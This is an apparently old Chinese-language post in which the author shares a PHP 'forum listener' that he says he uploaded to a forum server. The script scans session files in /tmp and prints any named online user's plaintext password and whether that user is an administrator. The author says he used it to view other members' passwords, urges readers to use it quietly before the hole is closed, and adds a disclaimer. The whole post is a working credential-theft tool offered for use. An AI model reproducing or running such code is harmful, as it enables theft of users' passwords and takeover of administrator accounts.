之所以是能寫(xiě)出來(lái)這個(gè)函數(shù)，主要是對(duì)該網(wǎng)站的session結(jié)構(gòu)清楚，如：name|s:4:"tasm";passwd|s:6:"111111";mode|s:1:"1"，也知道該session存放的位置，而且可以上傳文件，所以嘛，當(dāng)時(shí)就做了一次小小的黑客，在線的朋友的密碼可以一覽無(wú)余，呵呵：
<?
function submit1(){
global $username;
print "<title>論壇監(jiān)聽(tīng)器</title>";
$i=0;
if($username=="tasm"||$username=="Tasm")
{
print "你也太黑了吧？連我你也查？";
  return;
}
$path="/tmp/";
$d = dir($path);
while($entry=$d->read()){
if(substr($entry,0,4)=="sess"){
$entry=$path.$entry;
$ary=@file($entry);
if(!empty($ary[0])){
$ary = explode(";",$ary[0]);
$name= explode(":",$ary[0]);
if($name[2]=="\"".$username."\""){
$passwd= explode(":",$ary[1]);
$mode=explode(":",$ary[3]);
print "用戶筆名:".$name[2]."<br>使用密碼:".$passwd[2]."<br>使用模式:";
if($mode[1]==1)
print "<font color=red>管理員</font>";
else
print "一般用戶";
print"<br><br>偷他人密碼是不道德行為請(qǐng)少少為之<br>";
$i=1;
break;
}}}}
if(!$i)
print "用戶:".$username."真的在線嗎？如你確定，<a href='javascript:history.go(-1)'>請(qǐng)?jiān)賮?lái)一次</a>，不要多打空格！";
$d->close();
}

function login(){
?>
<html>
<head>
<title>論壇監(jiān)聽(tīng)器</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#FFFFFF">
<div align="center">
<p>論壇監(jiān)聽(tīng)器 </p>
<p> </p>
<table width="500" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="2">當(dāng)你看到一用戶在線時(shí)你想看他的密碼，你要如何作呢？</td>
</tr>
<tr>
<td colspan="2">讓我來(lái)告訴你：就是使用本程序。</td>
</tr>
<tr>
<td colspan="2"><font color=red>鄭重申明:本程序?yàn)樽杂沙绦?，由它所造成的任何損失本人蓋不負(fù)責(zé)。</font>
<br>不過(guò)這個(gè)問(wèn)題也許很快就會(huì)被堵上,個(gè)位還是不要張揚(yáng)的偷著用吧。</td>
</tr>
</table>
<form name="form1" method="post" action="<?print $PHP_SELF ?>" >
<p>請(qǐng)輸入你要查的用戶名：<br>
<input type="text" name="username">
</p>
<p>
<input type="submit" name="submit1" value="我同意以上申明,開(kāi)始查找">
</p>
</form>
<p> </p>
</div>
</body>
</html>
<?
}
//--------------main()
if($submit1)
submit1();
else
login();
?>

最新評(píng)論